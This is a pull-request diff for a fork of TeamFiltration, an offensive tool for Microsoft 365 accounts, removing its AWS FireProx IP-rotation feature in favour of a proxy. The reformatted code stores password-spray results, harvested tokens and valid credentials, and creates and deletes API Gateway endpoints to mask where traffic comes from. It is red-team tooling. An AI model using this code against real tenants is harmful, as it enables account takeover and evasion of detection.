### PR TITLE
Remove FireProx usage due to AWS policies

### DIFF
--- a/README.md
+++ b/README.md
@@ -15,6 +15,9 @@ This tool has been used internally at TrustedSec since January 2021 and was publ
 
 **The releases are precompiled into a single application-dependent binary. The size go up, but you do not need NET or any other dependencies to run them.**
 
+## Fork Changes
+The AWS Fireprox functionality has been removed from the spray and enumeration modules. Instead, the tool can route all traffic through the proxy defined in your configuration file. To activate this, you must use the --debug flag.
+
 ## Usage
 
 ```

--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@ This tool has been used internally at TrustedSec since January 2021 and was publ
 **The releases are precompiled into a single application-dependent binary. The size go up, but you do not need NET or any other dependencies to run them.**
 
 ## Fork Changes
-The AWS Fireprox functionality has been removed from the spray and enumeration modules. Instead, the tool can route all traffic through the proxy defined in your configuration file. To activate this, you must use the --debug flag.
+The AWS Fireprox functionality has been removed from the spray and enumeration modules. Instead, the tool can route all traffic through the proxy defined in your configuration file. The proxy is automatically used for spraying and enumeration. If you want to use the proxy for exfiltration, you must enable the --debug flag.
 
 ## Usage
 

--- a/TeamFiltration/TeamFiltration/Handlers/AWSHandler.cs
+++ b/TeamFiltration/TeamFiltration/Handlers/AWSHandler.cs
@@ -8,39 +8,41 @@ using TeamFiltration.Models.TeamFiltration;
 
 namespace TeamFiltration.Handlers
 {
-    public class AWSHandler
-    {
-        /*
+	public class AWSHandler
+	{
+		/*
             All credit to the peeps as Black Hills Information Security, this is simply a C# implementation of their FireProx tool.
             https://github.com/ustayready/fireprox
         */
-        private static GlobalArgumentsHandler _globalProperties { get; set; }
-        private static DatabaseHandler _databaseHandler { get; set; }
-        private static BasicAWSCredentials _basicAWSCredentials { get; set; }
-        private static SessionAWSCredentials _sessionAWSCredentials { get; set; }
-        private static AWSCredentials _AWSCredentials { get; set; }
+		private static GlobalArgumentsHandler _globalProperties { get; set; }
+		private static DatabaseHandler _databaseHandler { get; set; }
+		private static BasicAWSCredentials _basicAWSCredentials { get; set; }
+		private static SessionAWSCredentials _sessionAWSCredentials { get; set; }
+		private static AWSCredentials _AWSCredentials { get; set; }
 
 
-        public async Task<bool> DeleteFireProxEndpoint(string fireProxId, string region)
-        {
-            var amazonAPIGatewayClient = new AmazonAPIGatewayClient(_AWSCredentials, Amazon.RegionEndpoint.GetBySystemName(region));
 
-            Amazon.APIGateway.Model.DeleteRestApiResponse deleteRestApiResponse = await amazonAPIGatewayClient.DeleteRestApiAsync(new Amazon.APIGateway.Model.DeleteRestApiRequest() { RestApiId = fireProxId });
+		// Note: After changes there should not be fireprox used.
+		public async Task<bool> DeleteFireProxEndpoint(string fireProxId, string region)
+		{
+			var amazonAPIGatewayClient = new AmazonAPIGatewayClient(_AWSCredentials, Amazon.RegionEndpoint.GetBySystemName(region));
 
-            if (deleteRestApiResponse.HttpStatusCode == System.Net.HttpStatusCode.Accepted)
-            {
-                _databaseHandler.WriteLog(new Log("FIREPROX", $"Deleted endpoint https://{fireProxId}.execute-api.{region}.amazonaws.com/fireprox/", ""));
+			Amazon.APIGateway.Model.DeleteRestApiResponse deleteRestApiResponse = await amazonAPIGatewayClient.DeleteRestApiAsync(new Amazon.APIGateway.Model.DeleteRestApiRequest() { RestApiId = fireProxId });
 
-                _databaseHandler.DeleteFireProxEndpoint(fireProxId);
+			if (deleteRestApiResponse.HttpStatusCode == System.Net.HttpStatusCode.Accepted)
+			{
+				_databaseHandler.WriteLog(new Log("FIREPROX", $"Deleted endpoint https://{fireProxId}.execute-api.{region}.amazonaws.com/fireprox/", ""));
 
-                return true;
-            }
+				_databaseHandler.DeleteFireProxEndpoint(fireProxId);
+
+				return true;
+			}
 
 
-            return false;
-        }
-        
-        /*
+			return false;
+		}
+
+		/*
         public async Task ListFireProxEndpoint()
         {
             
@@ -52,16 +54,16 @@ namespace TeamFiltration.Handlers
             }
         }
         */
-        public async Task<(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint)> CreateFireProxEndPoint(string url, string title, string region)
-        {
-            var amazonAPIGatewayClient = new AmazonAPIGatewayClient(_AWSCredentials, Amazon.RegionEndpoint.GetBySystemName(region));
+		public async Task<(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint)> CreateFireProxEndPoint(string url, string title, string region)
+		{
+			var amazonAPIGatewayClient = new AmazonAPIGatewayClient(_AWSCredentials, Amazon.RegionEndpoint.GetBySystemName(region));
 
-            if (url.EndsWith('/'))
-                url = url.Substring(0, url.Length - 1);
+			if (url.EndsWith('/'))
+				url = url.Substring(0, url.Length - 1);
 
-            string versionDate = DateTime.UtcNow.ToString("yyyy-MM-ddTHH:mm:ssZ");
+			string versionDate = DateTime.UtcNow.ToString("yyyy-MM-ddTHH:mm:ssZ");
 
-            string template = @"
+			string template = @"
         {
           ""swagger"": ""2.0"",
           ""info"": {
@@ -154,75 +156,75 @@ namespace TeamFiltration.Handlers
             }
           }
         }";
-            template = template.Replace("{{url}}", url);
-            template = template.Replace("{{title}}", "teamfiltration_fireprox_" + title);
-            template = template.Replace("{{version_date}}", versionDate);
+			template = template.Replace("{{url}}", url);
+			template = template.Replace("{{title}}", "teamfiltration_fireprox_" + title);
+			template = template.Replace("{{version_date}}", versionDate);
 
-            var templateBytes = Encoding.UTF8.GetBytes(template);
+			var templateBytes = Encoding.UTF8.GetBytes(template);
 
-            var importRestApiAsyncResponse = await amazonAPIGatewayClient.ImportRestApiAsync(
-                new Amazon.APIGateway.Model.ImportRestApiRequest()
-                {
-                    Parameters = new Dictionary<string, string> {
-                        { "endpointConfigurationTypes", "REGIONAL" }
+			var importRestApiAsyncResponse = await amazonAPIGatewayClient.ImportRestApiAsync(
+				new Amazon.APIGateway.Model.ImportRestApiRequest()
+				{
+					Parameters = new Dictionary<string, string> {
+						{ "endpointConfigurationTypes", "REGIONAL" }
 
-                    },
-                    Body = new System.IO.MemoryStream(templateBytes)
-                }
-            );
+					},
+					Body = new System.IO.MemoryStream(templateBytes)
+				}
+			);
 
-            Amazon.APIGateway.Model.CreateDeploymentRequest createDeploymentRequest = new Amazon.APIGateway.Model.CreateDeploymentRequest()
-            {
-                Description = "TeamFiltration FireProx Prod",
-                StageDescription = "TeamFiltration FireProx Prod Stage",
-                StageName = "fireprox",
-                RestApiId = importRestApiAsyncResponse.Id
-            };
+			Amazon.APIGateway.Model.CreateDeploymentRequest createDeploymentRequest = new Amazon.APIGateway.Model.CreateDeploymentRequest()
+			{
+				Description = "TeamFiltration FireProx Prod",
+				StageDescription = "TeamFiltration FireProx Prod Stage",
+				StageName = "fireprox",
+				RestApiId = importRestApiAsyncResponse.Id
+			};
 
-            Amazon.APIGateway.Model.CreateDeploymentResponse createDeploymentAsyncResponse = await amazonAPIGatewayClient.CreateDeploymentAsync(createDeploymentRequest);
-
-
-            _databaseHandler.WriteLog(new Log("FIREPROX", $"Created endpoint https://{createDeploymentRequest.RestApiId}.execute-api.{region}.amazonaws.com/fireprox/", ""));
-
-            var fireproxEndpoint = new Models.AWS.FireProxEndpoint()
-            {
-                Deleted = false,
-                Active = true,
-                URL = url,
-                FireProxURL = $"https://{createDeploymentRequest.RestApiId}.execute-api.{region}.amazonaws.com/fireprox/",
-                Region = region,
-                RestApiId = createDeploymentRequest.RestApiId
-            };
-
-            _databaseHandler.WriteFireProxEndpoint(fireproxEndpoint);
+			Amazon.APIGateway.Model.CreateDeploymentResponse createDeploymentAsyncResponse = await amazonAPIGatewayClient.CreateDeploymentAsync(createDeploymentRequest);
 
 
-            return (createDeploymentRequest, fireproxEndpoint);
-        }
+			_databaseHandler.WriteLog(new Log("FIREPROX", $"Created endpoint https://{createDeploymentRequest.RestApiId}.execute-api.{region}.amazonaws.com/fireprox/", ""));
 
-        public AWSHandler(string AWSAccessKey, string AWSSecretKey, string AWSSessionToken, DatabaseHandler databaseHandler)
-        {
-            _databaseHandler = databaseHandler;
+			var fireproxEndpoint = new Models.AWS.FireProxEndpoint()
+			{
+				Deleted = false,
+				Active = true,
+				URL = url,
+				FireProxURL = $"https://{createDeploymentRequest.RestApiId}.execute-api.{region}.amazonaws.com/fireprox/",
+				Region = region,
+				RestApiId = createDeploymentRequest.RestApiId
+			};
 
-            if (!string.IsNullOrEmpty(AWSAccessKey) && !string.IsNullOrEmpty(AWSSecretKey) && string.IsNullOrEmpty(AWSSessionToken))
-            {
+			_databaseHandler.WriteFireProxEndpoint(fireproxEndpoint);
 
-                _basicAWSCredentials = new BasicAWSCredentials(
-                    AWSAccessKey,
-                    AWSSecretKey
-                    );
-                _AWSCredentials = _basicAWSCredentials;
-            }
-            else if (!string.IsNullOrEmpty(AWSAccessKey) && !string.IsNullOrEmpty(AWSSecretKey) && !string.IsNullOrEmpty(AWSSessionToken))
-            {
-                _sessionAWSCredentials = new SessionAWSCredentials(
-                    AWSAccessKey,
-                    AWSSecretKey,
-                    AWSSessionToken
-                    );
-                _AWSCredentials = _sessionAWSCredentials;
-            }
 
-        }
-    }
+			return (createDeploymentRequest, fireproxEndpoint);
+		}
+
+		public AWSHandler(string AWSAccessKey, string AWSSecretKey, string AWSSessionToken, DatabaseHandler databaseHandler)
+		{
+			_databaseHandler = databaseHandler;
+
+			if (!string.IsNullOrEmpty(AWSAccessKey) && !string.IsNullOrEmpty(AWSSecretKey) && string.IsNullOrEmpty(AWSSessionToken))
+			{
+
+				_basicAWSCredentials = new BasicAWSCredentials(
+					AWSAccessKey,
+					AWSSecretKey
+					);
+				_AWSCredentials = _basicAWSCredentials;
+			}
+			else if (!string.IsNullOrEmpty(AWSAccessKey) && !string.IsNullOrEmpty(AWSSecretKey) && !string.IsNullOrEmpty(AWSSessionToken))
+			{
+				_sessionAWSCredentials = new SessionAWSCredentials(
+					AWSAccessKey,
+					AWSSecretKey,
+					AWSSessionToken
+					);
+				_AWSCredentials = _sessionAWSCredentials;
+			}
+
+		}
+	}
 }

--- a/TeamFiltration/TeamFiltration/Handlers/DatabaseHandler.cs
+++ b/TeamFiltration/TeamFiltration/Handlers/DatabaseHandler.cs
@@ -10,91 +10,91 @@ using TimeZoneConverter;
 
 namespace TeamFiltration.Handlers
 {
-    public class DatabaseHandler
-    {
-        public LiteDatabase _globalDatabase { get; set; }
-        //  public GlobalArgumentsHandler _globalPropertiesHandler { get; set; }
-        public string DatabaseFullPath { get; set; }
-        public void OnProcessExit(object sender, EventArgs e)
-        {
-            _globalDatabase.Checkpoint();
-        }
+	public class DatabaseHandler
+	{
+		public LiteDatabase _globalDatabase { get; set; }
+		//  public GlobalArgumentsHandler _globalPropertiesHandler { get; set; }
+		public string DatabaseFullPath { get; set; }
+		public void OnProcessExit(object sender, EventArgs e)
+		{
+			_globalDatabase.Checkpoint();
+		}
 
-        // //QueryEnumeratedConditionalAccess
+		// //QueryEnumeratedConditionalAccess
 
-        public List<EnumeratedConditionalAccess> QueryEnumeratedConditionalAccess(string inputData)
-        {
-            var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
-            var condAcc = collectionLink.Find(x => x.Username.Equals(inputData)).ToList();
-            return condAcc;
+		public List<EnumeratedConditionalAccess> QueryEnumeratedConditionalAccess(string inputData)
+		{
+			var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
+			var condAcc = collectionLink.Find(x => x.Username.Equals(inputData)).ToList();
+			return condAcc;
 
-        }
+		}
 
-        internal void WriteEnumeratedConditionalAccess(EnumeratedConditionalAccess enumeratedConditionalAccesses)
-        {
-            var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
-            collectionLink.EnsureIndex(x => x.Id, true);
-            collectionLink.Upsert(enumeratedConditionalAccesses);
-
-
-        }
-
-        internal void WriteEnumeratedConditionalAccess(List<EnumeratedConditionalAccess> enumeratedConditionalAccesses)
-        {
-            var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
-            collectionLink.EnsureIndex(x => x.Id, true);
-            foreach (var item in enumeratedConditionalAccesses)
-            {
-                collectionLink.Upsert(item);
-            }
-
-        }
+		internal void WriteEnumeratedConditionalAccess(EnumeratedConditionalAccess enumeratedConditionalAccesses)
+		{
+			var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
+			collectionLink.EnsureIndex(x => x.Id, true);
+			collectionLink.Upsert(enumeratedConditionalAccesses);
 
 
-        public void WriteInvalidAcc(ValidAccount inputData)
-        {
-            var collectionLink = _globalDatabase.GetCollection<ValidAccount>("invalidaccounts");
-            collectionLink.Upsert(inputData);
+		}
+
+		internal void WriteEnumeratedConditionalAccess(List<EnumeratedConditionalAccess> enumeratedConditionalAccesses)
+		{
+			var collectionLink = _globalDatabase.GetCollection<EnumeratedConditionalAccess>("enumeratedconditionalaccess");
+			collectionLink.EnsureIndex(x => x.Id, true);
+			foreach (var item in enumeratedConditionalAccesses)
+			{
+				collectionLink.Upsert(item);
+			}
+
+		}
 
 
-        }
-        internal List<ValidAccount> QueryInvalidAccount()
-        {
-            var orders = _globalDatabase.GetCollection<ValidAccount>("invalidaccounts");
-            return orders.FindAll().ToList();
-        }
-
-        public void DeleteValidAcc(string username)
-        {
-            var collectionLink = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
-            collectionLink.DeleteMany(x => x.Username.Equals(username));
-            // _globalDatabase.Checkpoint();
-
-        }
-
-        public void WriteValidAcc(ValidAccount inputData)
-        {
-            var collectionLink = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
-            collectionLink.Upsert(inputData);
-            // _globalDatabase.Checkpoint();
-
-        }
-        //UpdateAccount
-        public bool UpdateAccount(SprayAttempt inputData)
-        {
-            var collectionLink = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            var result = collectionLink.Update(inputData);
-            _globalDatabase.Checkpoint();
-            return result;
-
-        }
-
-        
-        public List<PulledTokens> TokensAvailable(SprayAttempt accObject)
-        {
+		public void WriteInvalidAcc(ValidAccount inputData)
+		{
+			var collectionLink = _globalDatabase.GetCollection<ValidAccount>("invalidaccounts");
+			collectionLink.Upsert(inputData);
 
 
-            /*
+		}
+		internal List<ValidAccount> QueryInvalidAccount()
+		{
+			var orders = _globalDatabase.GetCollection<ValidAccount>("invalidaccounts");
+			return orders.FindAll().ToList();
+		}
+
+		public void DeleteValidAcc(string username)
+		{
+			var collectionLink = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
+			collectionLink.DeleteMany(x => x.Username.Equals(username));
+			// _globalDatabase.Checkpoint();
+
+		}
+
+		public void WriteValidAcc(ValidAccount inputData)
+		{
+			var collectionLink = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
+			collectionLink.Upsert(inputData);
+			// _globalDatabase.Checkpoint();
+
+		}
+		//UpdateAccount
+		public bool UpdateAccount(SprayAttempt inputData)
+		{
+			var collectionLink = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			var result = collectionLink.Update(inputData);
+			_globalDatabase.Checkpoint();
+			return result;
+
+		}
+
+
+		public List<PulledTokens> TokensAvailable(SprayAttempt accObject)
+		{
+
+
+			/*
             //If we are looking for a spesific resource
             if (!string.IsNullOrEmpty(resource))
             {
@@ -103,228 +103,228 @@ namespace TeamFiltration.Handlers
                     returnList.Add(tokenFromResource.ResponseData);
             }
             */
-            List<PulledTokens> returnList = new List<PulledTokens> { };
+			List<PulledTokens> returnList = new List<PulledTokens> { };
 
-            List<PulledTokens> latestPulledToken = this.QueryTokens(accObject);
+			List<PulledTokens> latestPulledToken = this.QueryTokens(accObject);
 
-            if (latestPulledToken.Count() > 0)
-            {
-                foreach (var item in latestPulledToken)
-                {
-                    if (Helpers.Generic.IsTokenValid(item?.ResponseData, item.DateTime))
-                        returnList.Add(item);
+			if (latestPulledToken.Count() > 0)
+			{
+				foreach (var item in latestPulledToken)
+				{
+					if (Helpers.Generic.IsTokenValid(item?.ResponseData, item.DateTime))
+						returnList.Add(item);
 
-                }
+				}
 
-            }
+			}
 
-            /*
+			/*
             if (Helpers.Generic.IsTokenValid(accObject.ResponseData, accObject.DateTime))
                 returnList.Add(accObject.);
             */
 
-            return returnList.ToList();
+			return returnList.ToList();
 
 
-        }
+		}
 
-        public void DeleteFireProxEndpoint(string RestApiId)
-        {
-            var orders = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
-            orders.DeleteMany(x => x.RestApiId.ToLower().Equals(RestApiId.ToLower()));
-        }
-        public void WriteFireProxEndpoint(FireProxEndpoint endpointData)
-        {
-            endpointData.DateTime = DateTime.Now;
-            var collectionLink = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
-            collectionLink.EnsureIndex(x => x.Id, true);
-            collectionLink.Upsert(endpointData);
-
-
-        }
+		public void DeleteFireProxEndpoint(string RestApiId)
+		{
+			var orders = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
+			orders.DeleteMany(x => x.RestApiId.ToLower().Equals(RestApiId.ToLower()));
+		}
+		public void WriteFireProxEndpoint(FireProxEndpoint endpointData)
+		{
+			endpointData.DateTime = DateTime.Now;
+			var collectionLink = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
+			collectionLink.EnsureIndex(x => x.Id, true);
+			collectionLink.Upsert(endpointData);
 
 
-        internal List<FireProxEndpoint> QueryAllFireProxEndpoints()
-        {
-
-            var orders = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
-            return orders.FindAll().ToList();
-        }
+		}
 
 
+		internal List<FireProxEndpoint> QueryAllFireProxEndpoints()
+		{
 
-        public void WriteSprayAttempt(SprayAttempt inputData, GlobalArgumentsHandler _globalPropertiesHandler)
-        {
-            if (inputData.Valid && _globalPropertiesHandler.Pushover)
-                _globalPropertiesHandler.PushAlert("VALID CREDENTIALS FOUND", $"Username: {inputData.Username}\n Password: {inputData.Password}\n Conditional access: {inputData.ConditionalAccess}\n Disqualified: {inputData.Disqualified}");
-
-            if (!string.IsNullOrEmpty(inputData.ResponseCode))
-                if (inputData.ResponseCode.Equals("AADSTS50053") && _globalPropertiesHandler.PushoverLocked)
-                    _globalPropertiesHandler.PushAlert("ACCOUNT LOCKED", $"Username: {inputData.Username}\n Password: {inputData.Password}\n Conditional access: {inputData.ConditionalAccess}\n Disqualified: {inputData.Disqualified}");
+			var orders = _globalDatabase.GetCollection<FireProxEndpoint>("fireproxendpoints");
+			return orders.FindAll().ToList();
+		}
 
 
-            inputData.DateTime = DateTime.Now;
-            var collectionLink = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            collectionLink.EnsureIndex(x => x.Id, true);
-            collectionLink.Upsert(inputData);
+
+		public void WriteSprayAttempt(SprayAttempt inputData, GlobalArgumentsHandler _globalPropertiesHandler)
+		{
+			if (inputData.Valid && _globalPropertiesHandler.Pushover)
+				_globalPropertiesHandler.PushAlert("VALID CREDENTIALS FOUND", $"Username: {inputData.Username}\n Password: {inputData.Password}\n Conditional access: {inputData.ConditionalAccess}\n Disqualified: {inputData.Disqualified}");
+
+			if (!string.IsNullOrEmpty(inputData.ResponseCode))
+				if (inputData.ResponseCode.Equals("AADSTS50053") && _globalPropertiesHandler.PushoverLocked)
+					_globalPropertiesHandler.PushAlert("ACCOUNT LOCKED", $"Username: {inputData.Username}\n Password: {inputData.Password}\n Conditional access: {inputData.ConditionalAccess}\n Disqualified: {inputData.Disqualified}");
 
 
-        }
-
-        public void WriteLog(Log inputLog, bool printLog = true, bool WriteLine = true)
-        {
-            //TimeZoneInfo
-
-            //TimeZoneInfo easternZone = TimeZoneInfo.FindSystemTimeZoneById("Eastern Standard Time");
-            TimeZoneInfo easternZone = TZConvert.GetTimeZoneInfo("Eastern Standard Time");
-
-            if (printLog)
-                if (string.IsNullOrEmpty(inputLog.Prefix))
-                    if (WriteLine)
-                        Console.WriteLine($"[{inputLog.Module}] { TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {inputLog.Message}");
-                    else
-                        Console.Write($"\r[{inputLog.Module}] { TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {inputLog.Message}");
-                else
-                {
-                    var msgPartOne = inputLog.Message.Split("=>")[0];
-                    var msgPartTwo = inputLog.Message.Split("=>")[1];
-                    var message = msgPartOne.PadRight(60) + "=>" + msgPartTwo;
-                    if (WriteLine)
-                        Console.WriteLine($"[{inputLog.Module}] {inputLog.Prefix.PadRight(12)} { TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {message}");
-                    else
-                        Console.Write($"\r[{inputLog.Module}] {inputLog.Prefix.PadRight(12)} { TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {message}");
-                }
+			inputData.DateTime = DateTime.Now;
+			var collectionLink = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			collectionLink.EnsureIndex(x => x.Id, true);
+			collectionLink.Upsert(inputData);
 
 
-            // var collectionLink = _globalDatabase.GetCollection<Log>("logs");
-            // collectionLink.EnsureIndex(x => x.Id, true);
-            // collectionLink.Insert(inputLog);
+		}
 
-        }
-        public DatabaseHandler(string[] args)
-        {
+		public void WriteLog(Log inputLog, bool printLog = true, bool WriteLine = true)
+		{
+			//TimeZoneInfo
 
-            var OutPutPath = args.GetValue("--outpath");
+			//TimeZoneInfo easternZone = TimeZoneInfo.FindSystemTimeZoneById("Eastern Standard Time");
+			TimeZoneInfo easternZone = TZConvert.GetTimeZoneInfo("Eastern Standard Time");
 
-            if (string.IsNullOrEmpty(OutPutPath))
-            {
-                Console.WriteLine("[+] Your are missing the mandatory --outpath argument, please define it!");
-                Environment.Exit(0);
-            }
-            else
-            {
-                if (Path.HasExtension(OutPutPath))
-                {
-                    Console.WriteLine("[+] The --outpath argument is a FOLDER path, not file. Correct it and try again!");
-                    Environment.Exit(0);
-                }
-
-            }
-
-            Directory.CreateDirectory(OutPutPath);
-            var fullPath = Path.Combine(OutPutPath, @"TeamFiltration.db");
-            DatabaseFullPath = fullPath;
-
-            _globalDatabase = new LiteDatabase(fullPath);
-            AppDomain.CurrentDomain.ProcessExit += new EventHandler(OnProcessExit);
-        }
-
-        //QueryValidAccount
-        internal List<ValidAccount> QueryValidAccount()
-        {
-            var orders = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
-            return orders.FindAll().ToList();
-        }
-        internal List<SprayAttempt> QueryValidLogins()
-        {
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Find(x => x.Valid == true).ToList();
-        }
-
-        internal SprayAttempt QueryValidLogin(string username)
-        {
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Find(x => x.Valid == true && x.Username.ToLower().Equals(username)).ToList().FirstOrDefault();
-        }
-
-        internal bool QueryComboHash(string comboHash)
-        {
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Exists(x => x.ComboHash.Equals(comboHash));
-        }
+			if (printLog)
+				if (string.IsNullOrEmpty(inputLog.Prefix))
+					if (WriteLine)
+						Console.WriteLine($"[{inputLog.Module}] {TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {inputLog.Message}");
+					else
+						Console.Write($"\r[{inputLog.Module}] {TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {inputLog.Message}");
+				else
+				{
+					var msgPartOne = inputLog.Message.Split("=>")[0];
+					var msgPartTwo = inputLog.Message.Split("=>")[1];
+					var message = msgPartOne.PadRight(60) + "=>" + msgPartTwo;
+					if (WriteLine)
+						Console.WriteLine($"[{inputLog.Module}] {inputLog.Prefix.PadRight(12)} {TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {message}");
+					else
+						Console.Write($"\r[{inputLog.Module}] {inputLog.Prefix.PadRight(12)} {TimeZoneInfo.ConvertTimeFromUtc(inputLog.Timestamp.ToUniversalTime(), easternZone)} EST {message}");
+				}
 
 
-        internal List<SprayAttempt> QueryDisqualified()
-        {
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Find(x => x.Disqualified == true).ToList();
-        }
+			// var collectionLink = _globalDatabase.GetCollection<Log>("logs");
+			// collectionLink.EnsureIndex(x => x.Id, true);
+			// collectionLink.Insert(inputLog);
 
-        internal List<SprayAttempt> QueryAllSprayAttempts()
-        {
+		}
+		public DatabaseHandler(string[] args)
+		{
 
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.FindAll().ToList();
-        }
-        internal List<string> QueryAllCombos()
-        {
+			var OutPutPath = args.GetValue("--outpath");
 
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.FindAll().Select(x => x.Username.ToLower() + ":" + x.Password).ToList();
-        }
-        internal List<string> QueryAllComboHash()
-        {
+			if (string.IsNullOrEmpty(OutPutPath))
+			{
+				Console.WriteLine("[+] Your are missing the mandatory --outpath argument, please define it!");
+				Environment.Exit(0);
+			}
+			else
+			{
+				if (Path.HasExtension(OutPutPath))
+				{
+					Console.WriteLine("[+] The --outpath argument is a FOLDER path, not file. Correct it and try again!");
+					Environment.Exit(0);
+				}
 
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.FindAll().Select(x => x.ComboHash).ToList();
-        }
+			}
 
+			Directory.CreateDirectory(OutPutPath);
+			var fullPath = Path.Combine(OutPutPath, @"TeamFiltration.db");
+			DatabaseFullPath = fullPath;
 
-        internal List<SprayAttempt> QuerySprayAttempts(int minutes)
-        {
-            var timeSearch = DateTime.Now.AddMinutes(-minutes);
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Find(x => x.DateTime >= timeSearch).ToList();
-        }
+			_globalDatabase = new LiteDatabase(fullPath);
+			AppDomain.CurrentDomain.ProcessExit += new EventHandler(OnProcessExit);
+		}
 
+		//QueryValidAccount
+		internal List<ValidAccount> QueryValidAccount()
+		{
+			var orders = _globalDatabase.GetCollection<ValidAccount>("validaccounts");
+			return orders.FindAll().ToList();
+		}
+		internal List<SprayAttempt> QueryValidLogins()
+		{
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Find(x => x.Valid == true).ToList();
+		}
 
-        internal List<SprayAttempt> QueryCombos(string password)
-        {
-            var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
-            return orders.Find(x => x.Password.Equals(password)).ToList();
-        }
+		internal SprayAttempt QueryValidLogin(string username)
+		{
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Find(x => x.Valid == true && x.Username.ToLower().Equals(username)).ToList().FirstOrDefault();
+		}
 
-        internal List<PulledTokens> QueryToken(string Username, string resource)
-        {
-            var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
-            var resourceHost = new Uri(resource).Host;
-            return pulledTokens.Find(x => x.Username.ToLower().Equals(Username.ToLower()) && x.ResourceUri.Contains(resourceHost)).OrderByDescending(x => x.DateTime).ToList();
-        }
-        
-
-        internal bool DeleteToken(PulledTokens token)
-        {
-            var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
-            return pulledTokens.Delete(token.Id);
-        }
-
-
-        internal List<PulledTokens> QueryTokens(SprayAttempt account)
-        {
-            var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
-            return pulledTokens.Find(x => x.Username.Equals(account.Username)).OrderByDescending(x => x.DateTime).ToList();
-        }
-
-        internal void WriteToken(PulledTokens account)
-        {
-            account.DateTime = DateTime.Now;
-            var collectionLink = _globalDatabase.GetCollection<PulledTokens>("tokens");
-            collectionLink.EnsureIndex(x => x.Id, true);
-            collectionLink.Upsert(account);
-            _globalDatabase.Checkpoint();
-        }
+		internal bool QueryComboHash(string comboHash)
+		{
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Exists(x => x.ComboHash.Equals(comboHash));
+		}
 
 
-    }
+		internal List<SprayAttempt> QueryDisqualified()
+		{
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Find(x => x.Disqualified == true).ToList();
+		}
+
+		internal List<SprayAttempt> QueryAllSprayAttempts()
+		{
+
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.FindAll().ToList();
+		}
+		internal List<string> QueryAllCombos()
+		{
+
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.FindAll().Select(x => x.Username.ToLower() + ":" + x.Password).ToList();
+		}
+		internal List<string> QueryAllComboHash()
+		{
+
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.FindAll().Select(x => x.ComboHash).ToList();
+		}
+
+
+		internal List<SprayAttempt> QuerySprayAttempts(int minutes)
+		{
+			var timeSearch = DateTime.Now.AddMinutes(-minutes);
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Find(x => x.DateTime >= timeSearch).ToList();
+		}
+
+
+		internal List<SprayAttempt> QueryCombos(string password)
+		{
+			var orders = _globalDatabase.GetCollection<SprayAttempt>("sprayattempts");
+			return orders.Find(x => x.Password.Equals(password)).ToList();
+		}
+
+		internal List<PulledTokens> QueryToken(string Username, string resource)
+		{
+			var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
+			var resourceHost = new Uri(resource).Host;
